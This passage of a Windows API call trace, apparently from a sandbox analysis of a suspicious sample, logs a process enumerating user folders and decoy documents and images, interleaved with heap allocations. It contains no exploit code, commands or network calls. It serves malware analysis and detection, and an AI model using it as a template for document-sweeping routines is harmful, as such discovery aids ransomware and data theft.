ftLastAccessTime.dwHighDateTime=0x1d5b65a, ftLastWriteTime.dwLowDateTime=0x654aa400, ftLastWriteTime.dwHighDateTime=0x1d5b65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_tGjm1G", cAlternateFileName="")) returned 1 [0091.028] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf366e0d0, ftCreationTime.dwHighDateTime=0x1d5bb93, ftLastAccessTime.dwLowDateTime=0x654aa400, ftLastAccessTime.dwHighDateTime=0x1d5b65a, ftLastWriteTime.dwLowDateTime=0x654aa400, ftLastWriteTime.dwHighDateTime=0x1d5b65a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_tGjm1G", cAlternateFileName="")) returned 0 [0091.028] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.028] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.028] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.028] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0091.028] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0091.028] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.028] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.028] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.029] PathFindFileNameW (pszPath="") returned="" [0091.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0091.029] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0091.029] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.029] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.029] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\") returned="HuRLDatxCVujdx\\" [0091.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0091.029] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0091.029] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0091.029] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0091.029] PathFindFileNameW (pszPath="") returned="" [0091.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HuRLDatxCVujdx\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19859800, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0x538d6d50, ftLastAccessTime.dwHighDateTime=0x1d5be7b, ftLastWriteTime.dwLowDateTime=0x538d6d50, ftLastWriteTime.dwHighDateTime=0x1d5be7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19859800, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0x538d6d50, ftLastAccessTime.dwHighDateTime=0x1d5be7b, ftLastWriteTime.dwLowDateTime=0x538d6d50, ftLastWriteTime.dwHighDateTime=0x1d5be7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1e0e910, ftCreationTime.dwHighDateTime=0x1d5b606, ftLastAccessTime.dwLowDateTime=0x7721af50, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x7721af50, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x139c9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0w4cso8bfItEFL0gz-o.gif", cAlternateFileName="0W4CSO~1.GIF")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3fec170, ftCreationTime.dwHighDateTime=0x1d5bef7, ftLastAccessTime.dwLowDateTime=0xb40c98b0, ftLastAccessTime.dwHighDateTime=0x1d5bfc3, ftLastWriteTime.dwLowDateTime=0xb40c98b0, ftLastWriteTime.dwHighDateTime=0x1d5bfc3, nFileSizeHigh=0x0, nFileSizeLow=0xf0d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HKxIojb2dDJ.ods", cAlternateFileName="HKXIOJ~1.ODS")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a07f10, ftCreationTime.dwHighDateTime=0x1d5c0a2, ftLastAccessTime.dwLowDateTime=0x775ab840, ftLastAccessTime.dwHighDateTime=0x1d5b792, ftLastWriteTime.dwLowDateTime=0x775ab840, ftLastWriteTime.dwHighDateTime=0x1d5b792, nFileSizeHigh=0x0, nFileSizeLow=0x6ba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hrfBUXVd6.jpg", cAlternateFileName="HRFBUX~1.JPG")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9395940, ftCreationTime.dwHighDateTime=0x1d5be42, ftLastAccessTime.dwLowDateTime=0x56ea49e0, ftLastAccessTime.dwHighDateTime=0x1d5bfad, ftLastWriteTime.dwLowDateTime=0x56ea49e0, ftLastWriteTime.dwHighDateTime=0x1d5bfad, nFileSizeHigh=0x0, nFileSizeLow=0xdbb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6NTjGWPf7Bn-3C.gif", cAlternateFileName="J6NTJG~1.GIF")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5292070, ftCreationTime.dwHighDateTime=0x1d5bdfb, ftLastAccessTime.dwLowDateTime=0x716e6f90, ftLastAccessTime.dwHighDateTime=0x1d5b5a2, ftLastWriteTime.dwLowDateTime=0x716e6f90, ftLastWriteTime.dwHighDateTime=0x1d5b5a2, nFileSizeHigh=0x0, nFileSizeLow=0x13773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MFSr.png", cAlternateFileName="")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9526d820, ftCreationTime.dwHighDateTime=0x1d5b86b, ftLastAccessTime.dwLowDateTime=0x7e321280, ftLastAccessTime.dwHighDateTime=0x1d5c36d, ftLastWriteTime.dwLowDateTime=0x7e321280, ftLastWriteTime.dwHighDateTime=0x1d5c36d, nFileSizeHigh=0x0, nFileSizeLow=0x176fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ou N_tIXZ_9N6u85h.ods", cAlternateFileName="OUN_TI~1.ODS")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa95ead0, ftCreationTime.dwHighDateTime=0x1d5b86f, ftLastAccessTime.dwLowDateTime=0x74206860, ftLastAccessTime.dwHighDateTime=0x1d5c254, ftLastWriteTime.dwLowDateTime=0x74206860, ftLastWriteTime.dwHighDateTime=0x1d5c254, nFileSizeHigh=0x0, nFileSizeLow=0x7cde, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u-kMkP.doc", cAlternateFileName="")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bb63440, ftCreationTime.dwHighDateTime=0x1d5c0c1, ftLastAccessTime.dwLowDateTime=0x56a07fd0, ftLastAccessTime.dwHighDateTime=0x1d5b7cf, ftLastWriteTime.dwLowDateTime=0x56a07fd0, ftLastWriteTime.dwHighDateTime=0x1d5b7cf, nFileSizeHigh=0x0, nFileSizeLow=0x18d54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uSviczcPXuVf6fam0Lcc.jpg", cAlternateFileName="USVICZ~1.JPG")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581db1d0, ftCreationTime.dwHighDateTime=0x1d5bde1, ftLastAccessTime.dwLowDateTime=0x83fe7940, ftLastAccessTime.dwHighDateTime=0x1d5b9fb, ftLastWriteTime.dwLowDateTime=0x83fe7940, ftLastWriteTime.dwHighDateTime=0x1d5b9fb, nFileSizeHigh=0x0, nFileSizeLow=0x8b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XhST2VyAgleTA.png", cAlternateFileName="XHST2V~1.PNG")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6defed60, ftCreationTime.dwHighDateTime=0x1d5bd88, ftLastAccessTime.dwLowDateTime=0x9099d120, ftLastAccessTime.dwHighDateTime=0x1d5bda9, ftLastWriteTime.dwLowDateTime=0x9099d120, ftLastWriteTime.dwHighDateTime=0x1d5bda9, nFileSizeHigh=0x0, nFileSizeLow=0xdc7b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zGQVw5ih.png", cAlternateFileName="")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc472e30, ftCreationTime.dwHighDateTime=0x1d5b8ed, ftLastAccessTime.dwLowDateTime=0x2aae72f0, ftLastAccessTime.dwHighDateTime=0x1d5b6d6, ftLastWriteTime.dwLowDateTime=0x2aae72f0, ftLastWriteTime.dwHighDateTime=0x1d5b6d6, nFileSizeHigh=0x0, nFileSizeLow=0x146b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_t22Wh63J4UmoxVIHba.m4a", cAlternateFileName="_T22WH~1.M4A")) returned 1 [0091.030] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc472e30, ftCreationTime.dwHighDateTime=0x1d5b8ed, ftLastAccessTime.dwLowDateTime=0x2aae72f0, ftLastAccessTime.dwHighDateTime=0x1d5b6d6, ftLastWriteTime.dwLowDateTime=0x2aae72f0, ftLastWriteTime.dwHighDateTime=0x1d5b6d6, nFileSizeHigh=0x0, nFileSizeLow=0x146b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_t22Wh63J4UmoxVIHba.m4a", cAlternateFileName="_T22WH~1.M4A")) returned 0 [0091.030] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0091.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0091.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0091.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4e38 [0091.030] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0091.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.030] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.030] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.031] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.031] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.032] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.032] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0091.033] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4dc0 | out: hHeap=0x680000) returned 1 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4dc0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0091.033] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0091.033] HeapFree 